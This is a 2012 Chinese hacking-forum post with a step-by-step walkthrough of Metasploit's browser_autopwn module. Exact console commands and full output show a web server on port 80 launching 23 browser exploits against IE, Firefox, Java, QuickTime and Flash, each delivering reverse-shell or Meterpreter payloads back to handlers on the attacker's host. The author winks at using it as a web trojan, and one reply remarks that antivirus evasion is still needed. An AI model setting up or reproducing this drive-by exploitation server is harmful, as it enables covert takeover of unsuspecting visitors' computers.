切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
8.MSF的浏览器的自动攻击[复制链接]
发表于 2012-8-4 17:46:45 | 显示全部楼层 |!read_mode!
这个很出名 需要一个模块:
  1. auxiliary/server/browser_autopwn
复制代码
进入模块
  1. msf > use auxiliary/server/browser_autopwn
  2. msf  auxiliary(browser_autopwn) >
复制代码
查看选项:
  1. msf  auxiliary(browser_autopwn) > show options

  2. Module options (auxiliary/server/browser_autopwn):

  3.    Name        Current Setting  Required  Description
  4.    ----        ---------------  --------  -----------
  5.    LHOST                        yes       The IP address to use for reverse-connect payloads
  6.    SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  7.    SRVPORT     8080             yes       The local port to listen on.
  8.    SSL         false            no        Negotiate SSL for incoming connections
  9.    SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  10.    SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  11.    URIPATH                      no        The URI to use for this exploit (default is random)

  12. msf  auxiliary(browser_autopwn) >
复制代码
写入路径 端口 本地IP
  1. msf  auxiliary(browser_autopwn) > set URIPATH /
  2. URIPATH => /
  3. smsf  auxiliary(browser_autopwn) > set SRVPORT 80
  4. SRVPORT => 80
  5. msf  auxiliary(browser_autopwn) > set LHOST 5.5.5.5
  6. LHOST => 5.5.5.5
复制代码
利用:
  1. msf  auxiliary(browser_autopwn) > exploit -j
  2. [*] Auxiliary module running as background job

  3. [*] Setup
  4. [*] Obfuscating initial javascript 2012-05-12 00:54:18 +0800
  5. msf  auxiliary(browser_autopwn) > [*] Done in 2.384552744 seconds

  6. [*] Starting exploit modules on host 5.5.5.5...
  7. [*] ---

  8. [*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
  9. [*] Using URL: http://0.0.0.0:80/ddhdAcffC
  10. [*]  Local IP: http://5.5.5.5:80/ddhdAcffC
  11. [*] Server started.
  12. [*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
  13. [*] Using URL: http://0.0.0.0:80/cQWVSarmvENft
  14. [*]  Local IP: http://5.5.5.5:80/cQWVSarmvENft
  15. [*] Server started.
  16. [*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
  17. [*] Using URL: http://0.0.0.0:80/PCUXHLZHgDo
  18. [*]  Local IP: http://5.5.5.5:80/PCUXHLZHgDo
  19. [*] Server started.
  20. [*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
  21. [*] Using URL: http://0.0.0.0:80/nldJEZpXZn
  22. [*]  Local IP: http://5.5.5.5:80/nldJEZpXZn
  23. [*] Server started.
  24. [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
  25. [*] Using URL: http://0.0.0.0:80/pGDIcGNA
  26. [*]  Local IP: http://5.5.5.5:80/pGDIcGNA
  27. [*] Server started.
  28. [*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
  29. [*] Using URL: http://0.0.0.0:80/fSCAoem
  30. [*]  Local IP: http://5.5.5.5:80/fSCAoem
  31. [*] Server started.
  32. [*] Starting exploit osx/browser/mozilla_mchannel with payload generic/shell_reverse_tcp
  33. [*] Using URL: http://0.0.0.0:80/NuWlTHgJVIeV
  34. [*]  Local IP: http://5.5.5.5:80/NuWlTHgJVIeV
  35. [*] Server started.
  36. [*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
  37. [-] Exploit exception: This exploit requires the zip command to be installed in your path
  38. [-] Failed to start exploit module osx/browser/safari_metadata_archive
  39. [*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
  40. [*] Using URL: http://0.0.0.0:80/AygVNgQ
  41. [*]  Local IP: http://5.5.5.5:80/AygVNgQ
  42. [*] Server started.
  43. [*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
  44. [*] Using URL: http://0.0.0.0:80/SMIhJpyYKh
  45. [*]  Local IP: http://5.5.5.5:80/SMIhJpyYKh
  46. [*] Server started.
  47. [*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
  48. [*] Using URL: http://0.0.0.0:80/pGyzgaboL
  49. [*]  Local IP: http://5.5.5.5:80/pGyzgaboL
  50. [*] Server started.
  51. [*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
  52. [*] Using URL: http://0.0.0.0:80/vUjoieyFsBMF
  53. [*]  Local IP: http://5.5.5.5:80/vUjoieyFsBMF
  54. [*] Server started.
  55. [*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
  56. [*] Starting exploit windows/browser/ibm_tivoli_pme_activex_bof with payload windows/meterpreter/reverse_tcp
  57. [*] Using URL: http://0.0.0.0:80/ivNENBy
  58. [*]  Local IP: http://5.5.5.5:80/ivNENBy
  59. [*] Server started.
  60. [*] Using URL: http://0.0.0.0:80/ymXSLsS
  61. [*]  Local IP: http://5.5.5.5:80/ymXSLsS
  62. [*] Server started.
  63. [*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
  64. [*] Using URL: http://0.0.0.0:80/pKOkOEMhyqQE
  65. [*]  Local IP: http://5.5.5.5:80/pKOkOEMhyqQE
  66. [*] Server started.
  67. [*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
  68. [*] Using URL: http://0.0.0.0:80/swPfj
  69. [*]  Local IP: http://5.5.5.5:80/swPfj
  70. [*] Server started.
  71. [*] Starting exploit windows/browser/mozilla_mchannel with payload windows/meterpreter/reverse_tcp
  72. [*] Using URL: http://0.0.0.0:80/oexaUrjMLdlK
  73. [*]  Local IP: http://5.5.5.5:80/oexaUrjMLdlK
  74. [*] Server started.
  75. [*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
  76. [*] Using URL: http://0.0.0.0:80/JWtKlYI
  77. [*]  Local IP: http://5.5.5.5:80/JWtKlYI
  78. [*] Server started.
  79. [*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
  80. [*] Using URL: http://0.0.0.0:80/phpDmyjmk
  81. [*]  Local IP: http://5.5.5.5:80/phpDmyjmk
  82. [*] Server started.
  83. [*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
  84. [*] Using URL: http://0.0.0.0:80/BowwakMRucRGD
  85. [*]  Local IP: http://5.5.5.5:80/BowwakMRucRGD
  86. [*] Server started.
  87. [*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
  88. [*] Using URL: http://0.0.0.0:80/OohQv
  89. [*]  Local IP: http://5.5.5.5:80/OohQv
  90. [*] Server started.
  91. [*] Starting exploit windows/browser/ms12_004_midi with payload windows/meterpreter/reverse_tcp
  92. [*] Using URL: http://0.0.0.0:80/LAIlwtaIT
  93. [*]  Local IP: http://5.5.5.5:80/LAIlwtaIT
  94. [*] Server started.
  95. [*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
  96. [*] Using URL: http://0.0.0.0:80/slkBjoab
  97. [*]  Local IP: http://5.5.5.5:80/slkBjoab
  98. [*] Server started.
  99. [*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
  100. [*] Using URL: http://0.0.0.0:80/vTjZSGEsrN
  101. [*]  Local IP: http://5.5.5.5:80/vTjZSGEsrN
  102. [*] Server started.
  103. [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
  104. [*] Starting handler for generic/shell_reverse_tcp on port 6666
  105. [*] Started reverse handler on 5.5.5.5:3333
  106. [*] Starting the payload handler...
  107. [*] Starting handler for java/meterpreter/reverse_tcp on port 7777
  108. [*] Started reverse handler on 5.5.5.5:6666
  109. [*] Starting the payload handler...
  110. [*] Started reverse handler on 5.5.5.5:7777
  111. [*] Starting the payload handler...

  112. [*] --- Done, found 23 exploit modules

  113. [*] Using URL: http://0.0.0.0:80/
  114. [*]  Local IP: http://5.5.5.5:80/
  115. [*] Server started.
复制代码
--- Done, found 23 exploit modules
23个网马  你懂的  Local IP: http://5.5.5.5:80/
查看进程

  1. msf  auxiliary(browser_autopwn) > jobs

  2. Jobs
  3. ====

  4.   Id  Name
  5.   --  ----
  6.   1   Exploit: windows/browser/ms10_018_ie_behaviors
  7.   2   Auxiliary: server/browser_autopwn
  8.   3   Exploit: multi/browser/firefox_escape_retval
  9.   4   Exploit: multi/browser/java_atomicreferencearray
  10.   5   Exploit: multi/browser/mozilla_compareto
  11.   6   Exploit: multi/browser/mozilla_navigatorjava
  12.   7   Exploit: multi/browser/opera_configoverwrite
  13.   8   Exploit: multi/browser/opera_historysearch
  14.   9   Exploit: osx/browser/mozilla_mchannel
  15.   11  Exploit: windows/browser/adobe_flash_mp4_cprt
  16.   12  Exploit: windows/browser/apple_quicktime_marshaled_punk
  17.   13  Exploit: windows/browser/apple_quicktime_rtsp
  18.   14  Exploit: windows/browser/apple_quicktime_smil_debug
  19.   15  Exploit: windows/browser/blackice_downloadimagefileurl
  20.   16  Exploit: windows/browser/ibm_tivoli_pme_activex_bof
  21.   17  Exploit: windows/browser/ie_createobject
  22.   18  Exploit: windows/browser/mozilla_interleaved_write
  23.   19  Exploit: windows/browser/mozilla_mchannel
  24.   20  Exploit: windows/browser/mozilla_nstreerange
  25.   21  Exploit: windows/browser/ms10_018_ie_behaviors
  26.   22  Exploit: windows/browser/ms11_003_ie_css_import
  27.   23  Exploit: windows/browser/ms11_050_mshtml_cobjectelement
  28.   24  Exploit: windows/browser/ms12_004_midi
  29.   25  Exploit: windows/browser/winzip_fileview
  30.   26  Exploit: windows/browser/wmi_admintools
  31.   27  Exploit: multi/handler
  32.   28  Exploit: multi/handler
  33.   29  Exploit: multi/handler

  34. msf  auxiliary(browser_autopwn) >
复制代码
杀死一个
  1. msf  auxiliary(browser_autopwn) > kill 1
  2. Stopping job: 1...

  3. [*] Server stopped.
  4. msf  auxiliary(browser_autopwn) >
复制代码
查看详细信息
  1. msf  auxiliary(browser_autopwn) > jobs -v

  2. Jobs
  3. ====

  4.   Id  Name                                                     Payload                          LPORT  URIPATH         Start Time
  5.   --  ----                                                     -------                          -----  -------         ----------
  6.   2   Auxiliary: server/browser_autopwn                                                                /               2012-05-12 00:54:18 +0800
  7.   3   Exploit: multi/browser/firefox_escape_retval             generic/shell_reverse_tcp        6666   /ddhdAcffC      2012-05-12 00:54:22 +0800
  8.   4   Exploit: multi/browser/java_atomicreferencearray         java/meterpreter/reverse_tcp     7777   /cQWVSarmvENft  2012-05-12 00:54:23 +0800
  9.   5   Exploit: multi/browser/mozilla_compareto                 generic/shell_reverse_tcp        6666   /PCUXHLZHgDo    2012-05-12 00:54:24 +0800
  10.   6   Exploit: multi/browser/mozilla_navigatorjava             generic/shell_reverse_tcp        6666   /nldJEZpXZn     2012-05-12 00:54:25 +0800
  11.   7   Exploit: multi/browser/opera_configoverwrite             generic/shell_reverse_tcp        6666   /pGDIcGNA       2012-05-12 00:54:26 +0800
  12.   8   Exploit: multi/browser/opera_historysearch               generic/shell_reverse_tcp        6666   /fSCAoem        2012-05-12 00:54:27 +0800
  13.   9   Exploit: osx/browser/mozilla_mchannel                    generic/shell_reverse_tcp        6666   /NuWlTHgJVIeV   2012-05-12 00:54:27 +0800
  14.   11  Exploit: windows/browser/adobe_flash_mp4_cprt            windows/meterpreter/reverse_tcp  3333   /AygVNgQ        2012-05-12 00:54:29 +0800
  15.   12  Exploit: windows/browser/apple_quicktime_marshaled_punk  windows/meterpreter/reverse_tcp  3333   /SMIhJpyYKh     2012-05-12 00:54:30 +0800
  16.   13  Exploit: windows/browser/apple_quicktime_rtsp            windows/meterpreter/reverse_tcp  3333   /pGyzgaboL      2012-05-12 00:54:32 +0800
  17.   14  Exploit: windows/browser/apple_quicktime_smil_debug      windows/meterpreter/reverse_tcp  3333   /vUjoieyFsBMF   2012-05-12 00:54:35 +0800
  18.   15  Exploit: windows/browser/blackice_downloadimagefileurl   windows/meterpreter/reverse_tcp  3333   /ymXSLsS        2012-05-12 00:54:36 +0800
  19.   16  Exploit: windows/browser/ibm_tivoli_pme_activex_bof      windows/meterpreter/reverse_tcp  3333   /ivNENBy        2012-05-12 00:54:37 +0800
  20.   17  Exploit: windows/browser/ie_createobject                 windows/meterpreter/reverse_tcp  3333   /pKOkOEMhyqQE   2012-05-12 00:54:38 +0800
  21.   18  Exploit: windows/browser/mozilla_interleaved_write       windows/meterpreter/reverse_tcp  3333   /swPfj          2012-05-12 00:54:38 +0800
  22.   19  Exploit: windows/browser/mozilla_mchannel                windows/meterpreter/reverse_tcp  3333   /oexaUrjMLdlK   2012-05-12 00:54:39 +0800
  23.   21  Exploit: windows/browser/ms10_018_ie_behaviors           windows/meterpreter/reverse_tcp  3333   /phpDmyjmk      2012-05-12 00:54:42 +0800
  24.   22  Exploit: windows/browser/ms11_003_ie_css_import          windows/meterpreter/reverse_tcp  3333   /BowwakMRucRGD  2012-05-12 00:54:42 +0800
  25.   23  Exploit: windows/browser/ms11_050_mshtml_cobjectelement  windows/meterpreter/reverse_tcp  3333   /OohQv          2012-05-12 00:54:43 +0800
  26.   24  Exploit: windows/browser/ms12_004_midi                   windows/meterpreter/reverse_tcp  3333   /LAIlwtaIT      2012-05-12 00:54:44 +0800
  27.   25  Exploit: windows/browser/winzip_fileview                 windows/meterpreter/reverse_tcp  3333   /slkBjoab       2012-05-12 00:54:45 +0800
  28.   26  Exploit: windows/browser/wmi_admintools                  windows/meterpreter/reverse_tcp  3333   /vTjZSGEsrN     2012-05-12 00:54:46 +0800
  29.   27  Exploit: multi/handler                                   windows/meterpreter/reverse_tcp  3333                   2012-05-12 00:54:47 +0800
  30.   28  Exploit: multi/handler                                   generic/shell_reverse_tcp        6666                   2012-05-12 00:54:49 +0800
  31.   29  Exploit: multi/handler                                   java/meterpreter/reverse_tcp     7777                   2012-05-12 00:54:49 +0800

  32. msf  auxiliary(browser_autopwn) >
复制代码
查看详细配置:
  1. msf  auxiliary(browser_autopwn) > jobs -i 2

  2. Name: HTTP Client Automatic Exploiter, started at 2012-05-12 00:54:18 +0800

  3. Module options (auxiliary/server/browser_autopwn):

  4.    Name        Current Setting  Required  Description
  5.    ----        ---------------  --------  -----------
  6.    LHOST       5.5.5.5          yes       The IP address to use for reverse-connect payloads
  7.    SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  8.    SRVPORT     80               yes       The local port to listen on.
  9.    SSL         false            no        Negotiate SSL for incoming connections
  10.    SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  11.    SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  12.    URIPATH     /                no        The URI to use for this exploit (default is random)

  13. msf  auxiliary(browser_autopwn) >
复制代码



操千曲而后晓声,观千剑而后识器。
发表于 2014-8-16 20:42:22 | 显示全部楼层
下一篇
发表于 2015-3-15 09:07:51 | 显示全部楼层
没有免杀都是浮云
发表于 2016-1-25 18:45:37 | 显示全部楼层
xiexie~~~~~~~~~~~~~~~~~~~

代码区

GMT+8, 2020-9-21 07:33

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部